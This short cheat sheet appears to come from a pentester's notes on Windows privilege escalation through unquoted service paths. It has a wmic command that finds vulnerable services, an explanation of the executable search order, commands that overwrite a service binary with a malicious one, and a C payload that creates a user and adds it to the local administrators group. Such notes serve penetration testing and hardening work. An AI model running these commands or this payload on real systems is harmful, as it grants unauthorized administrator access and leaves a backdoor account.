Unquoted paths

Enumeration

wmic

wmic service get name,displayname,pathname,startmode |findstr /i "Auto" |findstr /i /v "C:\Windows\\" |findstr /i /v """

Exploitation

Path hijack

Given the following path: C:\Program Files\a folder\app.exe Windows will search for the following executables: Program.exe Files.exe a.exe folder.exe app.exe By creating an executable and inserting it in the right place it will be run with Admin or Sys privileges.

Executable replacement

If the executable file's privileges allow overwriting it is possible to replace it with a malicious file.

icacls "<path to program's folder>"
cd <folder>
del /f <filename>.exe
move <path to malicious file>.exe ./<filename>.exe

Boilerplate C file

#include <stdlib.h>
int main ()
{
    int i;
    i = system("net user <user> <pass> /add");
    i = system("net localgroup administrators <user> /add");
    return 0;
}